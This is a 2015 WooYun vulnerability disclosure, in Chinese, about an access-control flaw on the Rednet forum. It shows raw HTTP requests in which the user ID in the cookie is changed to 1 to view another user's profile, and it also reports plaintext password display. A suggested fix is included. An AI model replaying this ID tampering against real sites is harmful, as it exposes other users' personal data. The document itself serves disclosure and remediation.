当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0108930
漏洞标题:
红网论坛存在横向越权漏洞(用户敏感信息泄露)
相关厂商:
红网
漏洞作者:
时间飞船
提交时间:
2015-04-23 17:35
修复时间:
2015-06-07 17:36
公开时间:
2015-06-07 17:36
漏洞类型:
未授权访问/权限绕过
危害等级:
自评Rank:
6
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-04-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

红网论坛存在横向越权漏洞,可以随意浏览他人个人资料。且修改密码时新密码明文显示在界面,注册成功后密码也明文回显。

详细说明:

修改个人资料request,用户身份通过客户端cookie中的ID参数提取:

GET /EditInfor.asp HTTP/1.1
Host: people.rednet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://people.rednet.cn/EditInfor.asp
Cookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=465825
Connection: keep-alive


漏洞证明:

修改用户ID=1

GET /EditInfor.asp HTTP/1.1
Host: people.rednet.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://people.rednet.cn/EditInfor.asp
Cookie: Hm_lvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429281476,1429369366,1429369682,1429369859; wdcid=338db40657044830; wdlast=1429369888; vjuids=67c7909da.14cc7d09008.0.89455f3a1acd9; vjlast=1429281477.1429368736.13; hiido_tod=17; hiido_ui=0.7879002586247603; hiido_lv=1429368739125; hiido_ti=1429369891704; ASPSESSIONIDSQSTCCDA=IMPOBJHAFAOJNGKJNMADGNNN; Hm_lpvt_fe4dc1c3f2f427e38ab444c0482ad49d=1429369888; wz%5Ftype=; wz%5Fuser%5FLingdaoId=; wz%5Fuser%5FlastLoginDatetime=; wz%5Fuser%5FLoginTimes=; wz%5Fuser%5FTrueName=; wz%5FUser%5Fpass=; wz%5FUser%5FIdName=; wz%5FUser%5FID=; peopleRednet2010=userinfo=tonylee123%40%401847100837f9a043%40%40482ff55ab7bed6efd4c1b238ceb42688&Huiyuan%5FIsLogin=yes&Huiyuan%5FLastLoginDatetime=2015%2F4%2F18+23%3A01%3A52&Huiyuan%5FLoginTimes=10&Huiyuan%5FIdName=tonylee123&Huiyuan%5FID=1
Connection: keep-alive


获得他人资料:

11.PNG


密码输入界面,新密码明文显示

12.PNG


注册成功后密码明文回显

13.PNG


修复方案:

建议从会话中提取用户信息。密码修改输入新密码需隐藏,注册成功不要明文回显密码。

版权声明:转载请注明来源 时间飞船@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)